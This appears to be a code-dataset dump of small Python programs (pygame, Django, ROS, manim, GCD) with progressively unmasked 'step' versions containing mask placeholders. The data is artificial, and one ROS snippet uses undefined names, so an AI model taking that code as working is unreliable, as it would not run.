screen.blit(self.image, self.rect)
<|reserved_special_token_1|>
import pygame
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
def set_image(self, src):
self.image = pygame.image.load(src)
self.rect = self.image.get_rect()
self.rect.y = self.y
self.rect.x = self.x
def draw(self, screen):
screen.blit(self.image, self.rect)
|
flexible
|
{
"blob_id": "071e3cf6b4337e0079bbb2c7694fff2468142070",
"index": 6505,
"step-1": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n <mask token>\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-3": "<mask token>\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n\n def set_image(self, src):\n self.image = pygame.image.load(src)\n self.rect = self.image.get_rect()\n self.rect.y = self.y\n self.rect.x = self.x\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-4": "import pygame\n\n\nclass BackGround:\n\n def __init__(self, x, y):\n self.y = y\n self.x = x\n\n def set_image(self, src):\n self.image = pygame.image.load(src)\n self.rect = self.image.get_rect()\n self.rect.y = self.y\n self.rect.x = self.x\n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
class Robot:
def __init__(self, name):
self.name = name
def say_hi(self):
print("Hi, I'm from class Robot")
print("Hi, Ich bin " + self.name)
def say_hi_to_everybody(self):
print("Hi to all objects :-)")
class PhysicianRobot(Robot):
def say_hi_again(self):
print("Hi, I'm from sub-class PhysicianRobot")
print("Hi, Ich bin " + self.name)
name_1 = "Marvin"
name_2 = "James"
x = Robot(name_1)
y = PhysicianRobot(name_2)
print(x, type(x))
x.say_hi()
x.say_hi_to_everybody()
print(y, type(y))
y.say_hi()
y.say_hi_again()
y.say_hi_to_everybody()
|
normal
|
{
"blob_id": "6b24c438ca7bb4c37ae356c18c562831767f0569",
"index": 9961,
"step-1": "<mask token>\n\n\nclass PhysicianRobot(Robot):\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\n<mask token>\n",
"step-3": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\n<mask token>\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-4": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print('Hi, Ich bin ' + self.name)\n\n def say_hi_to_everybody(self):\n print('Hi to all objects :-)')\n\n\nclass PhysicianRobot(Robot):\n\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print('Hi, Ich bin ' + self.name)\n\n\nname_1 = 'Marvin'\nname_2 = 'James'\nx = Robot(name_1)\ny = PhysicianRobot(name_2)\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-5": "class Robot:\n\n def __init__(self, name):\n self.name = name\n\n def say_hi(self):\n print(\"Hi, I'm from class Robot\")\n print(\"Hi, Ich bin \" + self.name)\n\n def say_hi_to_everybody(self):\n print(\"Hi to all objects :-)\")\n\n\nclass PhysicianRobot(Robot):\n def say_hi_again(self):\n print(\"Hi, I'm from sub-class PhysicianRobot\")\n print(\"Hi, Ich bin \" + self.name)\n\n\nname_1 = \"Marvin\"\nname_2 = \"James\"\n\nx = Robot(name_1)\ny = PhysicianRobot(name_2)\n\nprint(x, type(x))\nx.say_hi()\nx.say_hi_to_everybody()\n\nprint(y, type(y))\ny.say_hi()\ny.say_hi_again()\ny.say_hi_to_everybody()\n",
"step-ids": [
1,
6,
7,
8,
9
]
}
|
[
1,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
[(x * x) for x in a]
<|reserved_special_token_1|>
a = range(10)
[(x * x) for x in a]
<|reserved_special_token_1|>
a = range(10)
[x*x for x in a]
|
flexible
|
{
"blob_id": "018b9533074d2766dc5010ff9c5e70888d249b45",
"index": 1832,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n[(x * x) for x in a]\n",
"step-3": "a = range(10)\n[(x * x) for x in a]\n",
"step-4": "a = range(10)\n[x*x for x in a]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
roslib.load_manifest('learning_tf')
<|reserved_special_token_0|>
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
<|reserved_special_token_1|>
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
<|reserved_special_token_1|>
#! /usr/bin/env python
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
client = actionlib.SimpleActionClient('moveTo', turtlesim_)
client.wait_for_server()
goal = DoDishesGoal()
# Fill in the goal here
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
|
flexible
|
{
"blob_id": "791935f63f7a0ab2755ad33369d2afa8c10dffbb",
"index": 4708,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nroslib.load_manifest('learning_tf')\n<mask token>\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-3": "import roslib\nroslib.load_manifest('learning_tf')\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom goal.msg import moveAction, moveGoal\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-4": "#! /usr/bin/env python\nimport roslib\nroslib.load_manifest('learning_tf')\n\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nfrom goal.msg import moveAction, moveGoal\n\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n\n goal = DoDishesGoal()\n # Fill in the goal here\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
<|reserved_special_token_0|>
print(EuclidGCD(in_[0], in_[1]))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a % b
return EuclidGCD(b, a)
in_ = [int(n) for n in input().split()]
print(EuclidGCD(in_[0], in_[1]))
<|reserved_special_token_1|>
"""
Task. Given two integers a and b, find their greatest common divisor.
Input Format. The two integers a, b are given in the same line separated by space.
Constraints. 1<=a,b<=2·109.
Output Format. Output GCD(a, b).
"""
def EuclidGCD(a, b):
if b == 0:
return a
else:
a = a%b
return EuclidGCD(b, a)
in_ = [int(n) for n in input().split()]
print(EuclidGCD(in_[0], in_[1]))
|
flexible
|
{
"blob_id": "39d82267f966ca106ee384e540c31a3e5e433318",
"index": 2248,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\n<mask token>\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-4": "<mask token>\n\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a % b\n return EuclidGCD(b, a)\n\n\nin_ = [int(n) for n in input().split()]\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-5": "\"\"\"\nTask. Given two integers a and b, find their greatest common divisor.\nInput Format. The two integers a, b are given in the same line separated by space.\nConstraints. 1<=a,b<=2·109.\nOutput Format. Output GCD(a, b).\n\"\"\"\n\ndef EuclidGCD(a, b):\n if b == 0:\n return a\n else:\n a = a%b\n return EuclidGCD(b, a)\n\nin_ = [int(n) for n in input().split()]\nprint(EuclidGCD(in_[0], in_[1]))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import math
import pendulum
from none import *
@on_command('yearprogress')
async def year_progress(session: CommandSession):
await session.send(get_year_progress())
def get_year_progress():
dt = pendulum.now()
percent = year_progress(dt)
year = dt.year
return f'你的 {year} 使用进度:{percent}%\n' \
f'\n\n' \
f'{make_progress_string(percent)}'
def year_progress(dt):
year_days = 366 if dt.is_leap_year() else 365
passed_days = dt.timetuple().tm_yday
percent = math.floor((passed_days / year_days) * 100)
return percent
def make_progress_string(percent):
blocks = 15
percent = percent * blocks / 100
return ''.join(["▓" if i < percent else "░" for i in range(blocks)])
|
normal
|
{
"blob_id": "f54d0eeffa140af9c16a1fedb8dcd7d06ced29f2",
"index": 2395,
"step-1": "<mask token>\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-3": "<mask token>\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-4": "import math\nimport pendulum\nfrom none import *\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n\\n\\n{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor(passed_days / year_days * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([('▓' if i < percent else '░') for i in range(blocks)])\n",
"step-5": "import math\n\nimport pendulum\nfrom none import *\n\n\n@on_command('yearprogress')\nasync def year_progress(session: CommandSession):\n await session.send(get_year_progress())\n\n\ndef get_year_progress():\n dt = pendulum.now()\n percent = year_progress(dt)\n year = dt.year\n return f'你的 {year} 使用进度:{percent}%\\n' \\\n f'\\n\\n' \\\n f'{make_progress_string(percent)}'\n\n\ndef year_progress(dt):\n year_days = 366 if dt.is_leap_year() else 365\n passed_days = dt.timetuple().tm_yday\n percent = math.floor((passed_days / year_days) * 100)\n return percent\n\n\ndef make_progress_string(percent):\n blocks = 15\n percent = percent * blocks / 100\n return ''.join([\"▓\" if i < percent else \"░\" for i in range(blocks)])\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Products(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
<|reserved_special_token_1|>
from django.db import models
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
class Products(models.Model):
title = models.CharField(max_length=255)
year = models.IntegerField(default=0)
feature = models.CharField(max_length=30)
usage_status = models.CharField(max_length=25)
kms_driven = models.CharField(max_length=10)
price = models.CharField(max_length=10)
|
flexible
|
{
"blob_id": "5b0252dd862fe1e46c0c1df41935db16ae691dff",
"index": 7277,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Products(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-4": "from django.db import models\n\n\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-5": "from django.db import models\n\n\n# Create your models here.\nclass Products(models.Model):\n title = models.CharField(max_length=255)\n year = models.IntegerField(default=0)\n feature = models.CharField(max_length=30)\n usage_status = models.CharField(max_length=25)\n kms_driven = models.CharField(max_length=10)\n price = models.CharField(max_length=10)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class A_Scroller(Scene):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class A_Scroller(Scene):
<|reserved_special_token_0|>
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class A_Scroller(Scene):
CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
from manimlib.imports import *
class A_Scroller(Scene):
CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}
def construct(self):
text_1 = Text('3493', color='#DC3832')
text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)
text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)
text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)
text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)
text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)
text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)
text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)
text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)
text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
from manimlib.imports import *
class A_Scroller(Scene):
CONFIG={
"camera_config":{"background_color":"#FFFFFF"}
}
def construct(self):
text_1 = Text("3493", color="#DC3832")
text_2 = Text("3646", color="#221F20").shift(2*RIGHT)
text_3 = Text("4182", color="#2566AD").shift(4*RIGHT)
text_4 = Text("16417", color="#DC3832").shift(6*RIGHT)
text_5 = Text("18209", color="#221F20").shift(8*RIGHT)
text_6 = Text("18569", color="#2566AD").shift(10*RIGHT)
text_7 = Text("22229", color="#DC3832").shift(12*RIGHT)
text_8 = Text("24928", color="#221F20").shift(14*RIGHT)
text_9 = Text("26827", color="#2566AD").shift(16*RIGHT)
text_10 = Text("29779", color="#DC3832").shift(18*RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6, text_7, text_8, text_9, text_10)
text_11 = Text("30898", color="#221F20").shift(DOWN)
text_12 = Text("31568", color="#2566AD").shift(2*RIGHT+DOWN)
text_13 = Text("32075", color="#DC3832").shift(4*RIGHT+DOWN)
text_14 = Text("32777", color="#221F20").shift(6*RIGHT+DOWN)
text_15 = Text("33959", color="#2566AD").shift(8*RIGHT+DOWN)
text_16 = Text("35450", color="#DC3832").shift(10*RIGHT+DOWN)
text_17 = Text("37680", color="#221F20").shift(12*RIGHT+DOWN)
text_18 = Text("38268", color="#2566AD").shift(14*RIGHT+DOWN)
text_19 = Text("38269", color="#DC3832").shift(16*RIGHT+DOWN)
text_20 = Text("38849", color="#221F20").shift(18*RIGHT+DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15, text_16, text_17, text_18, text_19, text_20)
text_21 = Text("44204", color="#2566AD").shift(2*DOWN)
text_22 = Text("44798", color="#DC3832").shift(2*RIGHT+2*DOWN)
text_23 = Text("44814", color="#221F20").shift(4*RIGHT+2*DOWN)
text_24 = Text("45084", color="#2566AD").shift(6*RIGHT+2*DOWN)
text_25 = Text("45252", color="#DC3832").shift(8*RIGHT+2*DOWN)
text_26 = Text("46041", color="#221F20").shift(10*RIGHT+2*DOWN)
text_27 = Text("46380", color="#2566AD").shift(12*RIGHT+2*DOWN)
text_28 = Text("47891", color="#DC3832").shift(14*RIGHT+2*DOWN)
text_29 = Text("51126", color="#221F20").shift(16*RIGHT+2*DOWN)
text_30 = Text("51599", color="#2566AD").shift(18*RIGHT+2*DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25, text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2*UP).shift(20*RIGHT)
all_numbers_2.move_to(2*UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10, rate_func=linear)
|
flexible
|
{
"blob_id": "97c97f18d1b93dc54538a0df7badafd961fdcb9c",
"index": 3588,
"step-1": "<mask token>\n\n\nclass A_Scroller(Scene):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass A_Scroller(Scene):\n <mask token>\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = 